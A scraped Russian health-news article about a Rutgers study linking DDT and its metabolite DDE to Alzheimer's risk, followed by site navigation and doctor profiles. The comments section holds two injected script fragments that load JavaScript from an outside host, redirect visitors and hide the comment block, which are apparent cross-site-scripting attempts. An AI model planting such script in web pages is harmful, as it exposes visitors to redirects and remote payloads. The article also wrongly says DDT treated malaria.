Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  ДДТ вызывает старческое с...  >>  ДДТ вызывает старческое слабоумие
 
Обратная связь
 

ДДТ вызывает старческое слабоумие

Размер шрифта
24 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Не пугайтесь: речь идет не о Юрии Шевчуке, а об одном из промышленных ядов.

ДДТ вызывает старческое слабоумие

Дихлородифенилтрихлороэтан (ДДТ) – это пестицид, ранее активно применявшийся для лечения малярии. Теперь же ученые считают, что это вещество может приводить к печально известной болезни Альцгеймера.

Исследователи пришли к такому выводу, изучив состав крови пациентов с этим заболеванием. Оказалось, что концентрация ДДЕ (одного из продуктов распада ДДТ) у них повышена в четыре раза по сравнению со здоровыми людьми.

При этом большинство пациентов в прошлом контактировали с этим пестицидом, что совсем неудивительно, учитывая масштабы его применения в ранние послевоенные годы.

ДДТ, без сомнений, является самым изученным пестицидом. Хорошо известно его свойство надолго задерживаться в продуктах питания и воде, а также плеяда негативных эффектов на здоровье человека: от не вынашивания беременности и мужского бесплодия до поражения печени и рака.

В 1962 году вышла книга под названием «Тихая весна» за авторством биолога Рейчел Кэрсон. Этот труд положил начало крупномасштабной кампании против применения ДДТ в сельском хозяйстве США, которая увенчалась безоговорочным успехом спустя десять лет. Во всем остальном мире аналогичный запрет вступил в силу намного позже, лишь в 2001 году.

Несмотря на это, следы ДДТ до сих пор обнаруживаются в окружающей среде, продуктах питания и образцах человеческой крови.

Исследование, о котором мы ведем речь, проводилось на базе Ратгерского университета (штат Нью-Джерси, США). Авторы обнаружили, что хотя ДДТ и не вызывает болезнь Альцгеймера напрямую, но воздействие этого вещества является одним из факторов риска, особенно для людей с повышенной экспрессией гена ApoE4.

Ученых давно интересовал вопрос, почему этот ген играет столь большую роль в развитии болезни Альцгеймера. В некоторых исследованиях обнаружилось, что продукты экспрессии ApoE4 способствуют отложению белка бета-амилоида в нервной ткани, что повышает восприимчивость последней к воспалению и окислительному стрессу.

В данном исследовании ученым удалось выяснить, что высокие уровни ДДТ и ДДЕ ассоциированы с более грубыми нарушениями когнитивной сферы и более выраженным отложением амилоида в мозге.

Авторы убеждены, что их работа добавляет важный элемент исполинских размеров в мозаику под названием «Роль факторов среды в развитии альцгеймеровской деменции».

Другие статьи об этом заболевании и не только читайте на страницах нашего специального проекта «Как сохранить память».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшие привычки для молодости мозга   Как Эйнштейн и Пугачева помогут поставить диагноз старческого слабоумия   Арахис и линейка предскажут ваше будущее   Медная посуда вызывает слабоумие  
17 января 2013Старческого маразма больше нет! Изобретена вакцина против болезни Альцгеймера! 14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия
 
19 марта 2013Аспирин спасает от старческого слабоумия 06 марта 2013Ученые победили старость: забытое лекарство возвращает память
 

Слайдшоу

1
Как не сойти с ума в старости
5 признаков того, что ваша мама не узнает вас
Мифы и правда о старческом слабоумии

Тесты

Возраст мозга
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.